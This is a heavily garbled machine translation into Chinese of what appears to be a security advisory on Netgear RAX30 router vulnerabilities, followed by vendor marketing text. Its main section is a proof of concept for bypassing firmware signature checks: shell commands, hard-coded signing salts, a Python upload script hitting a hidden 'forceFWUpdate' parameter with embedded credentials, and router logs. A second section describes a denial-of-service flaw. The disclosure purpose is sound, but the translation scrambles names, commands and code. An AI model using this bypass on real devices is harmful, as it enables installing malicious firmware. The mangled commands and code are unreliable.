脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

美国网件公司RAX30多个漏洞

剧情简介

绕过固件升级签名检查(Post-Auth) - cve - 2023 - 28337
当上传一个固件图像设备的更新,一个隐藏的“forceFWUpdate”参数可能会提供给力升级完成,绕过某些验证检查。终端用户可以使用此上传修改,非官方的,潜在的恶意固件到设备。
作为一个概念验证,我们下载固件V1.0.9.92_1,和修改它读V9.9.9.99_9通过运行下面的命令:
sed - i - e s / V1.0.9.92_1 / V9.9.9.99_9 / g。/ RAX30.img
接下来,我们剥头值获得的原始图像,在这种情况下,它是76个字节长。我们也使用硬编码的值创建固件签名时使用。
如果=。/ RAX30 dd。img的=图像b = 1跳过如果= = 76 dd。/ RAX30。img =头b = 1的数如果= = 76 dd。/ = header_without_hash b = 1头跳过= 36 echo - n hr89sdfgjkehx > sha_head echo - n nohsli9fjh3f > sha_tail
结合相关数据生成所需的散列。
#猫sha_head header_without_hash形象sha_tail > modified_image # openssl dgst -sha256 modified_image
更新标题使用上面的散列值并重新“形象”。The firmware will now see this as a properly signed firmware image.
以下PoC被用来演示成功的上传:
# # # # #
导入请求burp0_url = "http://123.123.123.1:80 / cgi -bin / rex_cgi ? =函数forceFWUpdate&csrftoken =1391963467“burp0_cookies ={“会话”:“72年rmsezn78dq4irbxcbowxbp8bgmo1吉隆坡“}burp0_headers ={“用户代理”:“Mozilla / 5.0 (Macintosh;Intel Mac OS X 10.15;房车:Firefox 108.0)壁虎/ 20100101 / 108.0”,“接受”:“application / json, text / javascript, * / *;q = 0.01”、“接收语言”:“en - us, en; q = 0.5”,“接受编码”:“gzip、缩小”、“X-Requested-With”:“XMLHttpRequest”、“起源”:“http://123.123.123.1”、“授权”:“基本YWRtaW46TGFicGFzczEyMyE =”、“连接”:“关闭”、“推荐人”:“http://123.123.123.1/UPG_upgrade.html”}= {“mtenFWUpload”:打开的文件(“upload_image。img”、“rb ")}requests.post(标题= burp0_headers burp0_url饼干= burp0_cookies文件=文件)
# # # # #
路由器的日志显示上传成功。
# # # # #
CGI_DEBUG > cgi_main。c: 427:输入CGI……CGI_DEBUG > cgi_main。c: 293: pData - > pBoundryStr = "676年f250848d2deaec8af8b22701d2f38“CGI_DEBUG > cgi_main。c: 453: env。reqUri /目录/ rex_cgi CGI_DEBUG > cgi_main。c: 454: env。pSetQueryString CGI_DEBUG > cgi_main (null)。c: 455: env。pGetQueryString函数= forceFWUpdate&csrftoken = 1391963467 CGI_DEBUG > cgi_main。c: 467:上传文件CGI_DEBUG > cgi_upload过程。c: 1165: content_len = 67936077 upload_type = 1 rm:不能删除“/ tmp / fw / guiCheck”:没有这样的文件或目录CGI_DEBUG > cgi_upload。c: 597: content_len = 67936077 upload_type = 1 CGI_DEBUG > cgi_upload。c: 612:开始边界= >—676年f250848d2deaec8af8b22701d2f38 < = CGI_DEBUG > cgi_upload。c: 645: upload_image文件名”。img“CGI_ERROR > cgi_upload。c: 666:图象尺寸= 67936043 CGI_DEBUG > cgi_upload。c: 673: http:统计uboot env /proc/environment CGI_DEBUG > cgi_upload / single_image使用单一的形象。c: 703:上传len = 131072 CGI_DEBUG > cgi_upload开始。c: 705: httpd:分配131072字节缓冲区来保存图像。CGI_DEBUG > cgi_upload。c: 713: 131072字节分配给图像数据在0 xb6677018 CGI_DEBUG > cgi_upload。c: 714: httpd:分配的内存。CGI_DEBUG > cgi_upload。c: 888:发现头标志,新的validImageBlockSize 130996 CGI_DEBUG > cgi_upload。c: 889: cur_ver = V1.0.9.92_1 new_ver = V9.9.9.99_9 CGI_DEBUG > cgi_upload。c: 947: 262144字节分配给图像数据在0 xb6535018 CGI_DEBUG > cgi_upload。c: 948: httpd:分配的内存。 CGI_DEBUG> cgi_upload.c:377: got rc=0 after 67935957 bytes CGI_DEBUG> cgi_upload.c:800: fgetc got EOF after 171733 bytes CGI_DEBUG> cgi_upload.c:816: searching for boundary =>--676年f250848d2deaec8af8b22701d2f38 < = CGI_DEBUG > cgi_upload。c: 820:发现边界CGI_DEBUG > cgi_upload结束。c: 834: 171693年发现边界validImageBlockSize imageSizeAcc 67935841 CGI_DEBUG > cgi_upload。c: 957:最终的图像imageSizeAcc = 67935841,结果= 0
# # # # #
  • CVSSv3 - 8.0 - AV: /交流:L /公关:L / UI: N / S: U / C: H /我:H: H

文件上传拒绝服务- cve - 2023 - 28338

任何请求发送到设备的web服务包含一个“内容类型”“multipartboundary = "将导致请求主体被写入“/ tmp / mulipartFile”设备本身。一个足够大的文件将导致设备资源耗尽,导致设备变得无法使用,直到它重新启动。

  • CVSSv3 AV: /交流:L /公关:N / UI: N / S: U / C: N /我:6.5 N / A: H

解决方案

这本刊物的时候,供应商不提供补丁或者推荐应对这些问题。

披露时间表

2022年12月12日—站得住脚的披露问题供应商。
2022年12月16日—供应商请求澄清和承认。
2022年12月16日—站得住脚的提供澄清。
2022年12月27日,供应商要求澄清。
2022年12月28日,成立承认请求和状态信息将尽快提供。
2023年1月5日—供应商请求澄清。
2023年1月6日,成立提供澄清。
2023年1月9日—供应商收到之前的邮件图片表达的技术问题。成立以不同的格式重新发送。
2023年2月3日——供应商请求延期至2023年5月的报告问题。
2023年2月6日——站得住脚的否认扩展的要求。
2023年2月7日——2023年5月供应商请求扩展请求的一个问题。
2023年2月7日——站得住脚的再次否认扩展的要求。
2023年3月6日——站得住脚的通知与安全相关的补丁发布不另行通知。请求更多的信息从供应商。
2023年3月6日,站得住脚的通知供应商发布了补丁没有适当的协调。我们的顾问会在3月8日,除非另有争议。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2023 - 12所示
信贷
埃文·格兰特,吉米Sebree
受影响的产品
美国网件公司夜鹰WiFi6路由器
风险因素

咨询时间

2023年3月14日—初始释放

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map